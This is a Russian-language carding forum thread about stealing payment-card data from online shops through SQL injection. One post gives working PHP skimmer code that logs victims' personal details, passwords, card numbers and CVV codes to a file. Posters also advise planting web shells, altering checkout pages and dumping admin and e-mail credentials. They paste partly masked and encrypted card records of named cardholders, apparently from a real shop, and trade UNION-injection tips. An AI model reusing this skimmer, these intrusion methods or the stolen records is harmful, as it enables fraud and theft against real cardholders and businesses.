Видео: SQL - инъекция, добыча картона.

Passion · Mar 24, 2011

Частенько находит.

<?PHP
$firstname = $_POST['firstname'];
$lastname = $_POST['lastname'];
$dob = $_POST['dob'];
$email_address = $_POST['email_address'];
$street_address = $_POST['street_address'];
$postcode = $_POST['postcode'];
$city = $_POST['city'];
$password = $_POST['password'];
$confirmation = $_POST['confirmation'];
$card_number = $_POST['card_number'];
$expiration = $_POST['expiration'];
$holdername = $_POST['holdername'];
$cvvcode = $_POST['cvvcode'];

$log = fopen("base.php","a+");
fwrite($log,"\n $firstname:$lastname:$dob:$email_address:$street_address:$postcode:$city:$password:$confirmation:$card_number:$expiration:$holdername:$cvvcode \n");
fclose($log);
echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://куда послать юзера после того как ввел данные'></head></html>";
?>

Так же нужно изменить саму страницу, что бы проходило через этот скрип.

---------- Сообщение добавлено в 16:12 ---------- Предыдущее сообщение размещено в 16:11 ----------

И все под себя подогнать.

goldeff · Mar 24, 2011

DJ4J, полазил я по твоему шопу(_huntmysteries.com), ради практики и интереса

Вобщем добрался до картона. Но он там в таком виде:

5
Visa:Brick Despain:XXXXXXXXXXXX2444:0508:
By 3, 2 : 1

5
Visaatrick B Dillon:XXXXXXXXXXXX9396:1010:
By 3, 2 : 1

5
Visa:James Gale:XXXXXXXXXXXX5553:0808:
By 3, 2 : 1

5
Visa:john jacobson:XXXXXXXXXXXX5071:0110:
By 3, 2 : 1

5
Visa:Allison Petersen:XXXXXXXXXXXX4829:0808:

И свв к ним нет. Passion, когда такое всеречается, можно ХХХ обойти/открыть, или уже все, картон не достать?

DJ4J · Mar 24, 2011

так я же говорил что он в открытом виде не хранится.

Вроде никак не достать .

goldeff · Mar 24, 2011

DJ4J, значит я тебя не понял. подумал ты добраться до картона не смог

Получается в таких случаях через залитый шелл можно выдернуть? правильно?

Passion · Mar 24, 2011

goldeff, я такое не встречал, но я бы попробовал залить шелл туда(пригодится на всякий случай)) и так же бы изменил страницу куда вбивают картон, что бы проходили данные через скрипт и записывались в базу. Был бы каждый раз свежий картон. Видимо шоп закрывает данные на XXX, но все равно когда холдер вводит данные они в нормальном виде и так же для себя думаю он где-то хранит в нормальном виде картон.

---------- Сообщение добавлено в 18:31 ---------- Предыдущее сообщение размещено в 18:28 ----------

Сливай мыла и пароли, чекай на валид и смотри палку или другие плат. системы у юзеров.

DJ4J · Mar 24, 2011

В любом случае шелы неплохо скупают.
Во время поиска шопа с картоном можно залить несколько штучек.
Проблемы были только с поиском админки.

PokerLife · Mar 25, 2011

У меня в одном из шопов жизненоважная инфа показывается в виде кодировки ( %5C%AD%BA%05%02 или R%2AW%DE%B7%EE%13%8A%98%5E%CD%B6M9T%E6). Кто подскажет что это за вид хеша?

Passion · Mar 25, 2011

Это как выводится, ручками или программой?

PokerLife · Mar 25, 2011

Passion said:
Это как выводится, ручками или программой?

прогой......захешены только cvv и номер карты...все остальное открыто....покопался на insider' е....не увидел похожих

p.s. прога не панголин и не хелпер (больно уж низкие у них результаты отображения данных).

Самое смешное,что руками никак не выходит раскрыть шоп.....вот такая засада....

Passion · Mar 25, 2011

PokerLife, что за софтина такая?
Логин и пароль же можешь слить админа?

PokerLife · Mar 25, 2011

Passion said:
PokerLife, что за софтина такая?
Логин и пароль же можешь слить админа?

пассы и мыльники норм открываются....софт скинул в пм...

goldeff · Mar 25, 2011

Такая ситуация. Есть ошибка для инъекции, смог определить количество таблиц, а дальше при определении таблици с которой надо работать (id=1+union+select+1,2,3,4,5,6--) выдает только это:

Warning: pg_query() [function.pg-query]: Query failed: ERROR: each UNION query must have the same number of columns in /usr/www/cmr/productdetail.php on line 60

Warning: pg_num_rows(): supplied argument is not a valid PostgreSQL result resource in /usr/www/cmr/productdetail.php on line 61

Warning: pg_query() [function.pg-query]: Query failed: ERROR: UNION types character varying and integer cannot be matched in /usr/www/cmr/includes/leftnav.php on line 39

Warning: pg_num_rows(): supplied argument is not a valid PostgreSQL result resource in /usr/www/cmr/includes/leftnav.php on line 40

типа все? дальше не пройти?

хелпер тоже не может взломать. но ошибка при id=1' появляется, при id=1 уходит. и количество таблиц дает определить.

Мёртвый · Mar 25, 2011

goldeff said:
Такая ситуация. Есть ошибка для инъекции, смог определить количество таблиц, а дальше при определении таблици с которой надо работать (id=1+union+select+1,2,3,4,5,6--) выдает только это:

типа все? дальше не пройти?

хелпер тоже не может взломать. но ошибка при id=1' появляется, при id=1 уходит. и количество таблиц дает определить.

не забывай что это не MySql это PostgreSQL

PokerLife · Mar 25, 2011

goldeff said:
Такая ситуация. Есть ошибка для инъекции, смог определить количество таблиц, а дальше при определении таблици с которой надо работать (id=1+union+select+1,2,3,4,5,6--) выдает только это:

типа все? дальше не пройти?

хелпер тоже не может взломать. но ошибка при id=1' появляется, при id=1 уходит. и количество таблиц дает определить.

проштудируй ачат..там не раз писали наскольк опомню о подобном..и вообще на эту тему там масса информации

Мёртвый · Mar 25, 2011

PokerLife said:
У меня в одном из шопов жизненоважная инфа показывается в виде кодировки ( %5C%AD%BA%05%02 или R%2AW%DE%B7%EE%13%8A%98%5E%CD%B6M9T%E6). Кто подскажет что это за вид хеша?

вот именно кодировка, но не хешь, (во всяком случае я таких хешей не встречал) скриптов для кодировки множество, какой хз

goldeff · Mar 25, 2011

не забывай что это не MySql это PostgreSQL

pg не раскрутить? только мускль?
только начал осваивать немного эту тему. учусь типа

На ачате слишком много инфы, мозги кипят. а хочется побыстрее разобраться, шоп хороший

Мёртвый · Mar 25, 2011

goldeff said:
pg не раскрутить? только мускль?
только начал осваивать немного эту тему. учусь типа
На ачате слишком много инфы, мозги кипят. а хочется побыстрее разобраться, шоп хороший

как же так не раскрутить -)
быть не может если есть иньекция, иногда бывает просто ошибка (тоже нужно учесть)

Keltos · Mar 25, 2011

goldeff, запили мессагу forum.antichat.ru/thread46016.html

ps forum.antichat.ru/thread35599.html

goleon · Mar 26, 2011

PokerLife said:
софт скинул в пм...

Скинь софт в пм если не жалко.

goldeff · Mar 26, 2011

пол дня шоп искал, а там такая хрень с картоном:

VISA:Alan P. Dine:m��'ߕ�<��z�5ؗyG��b�$�:834:08:2011

VISA:Guy R Smith:S�BEj�z�4��yG��b�$�:363:03:2012

VISA:JACI REED:w��T*��)_��7ǛvE��0��;�:596:06:2010

Знает, кто, как расшифровать?

Видео: SQL - инъекция, добыча картона.

VIP member

Professional

RIPPER

Professional

VIP member

RIPPER

RIPPER

VIP member

RIPPER

VIP member

RIPPER

Professional

VIP member

RIPPER

VIP member

Professional

VIP member

VIP member

Member

Professional

Similar threads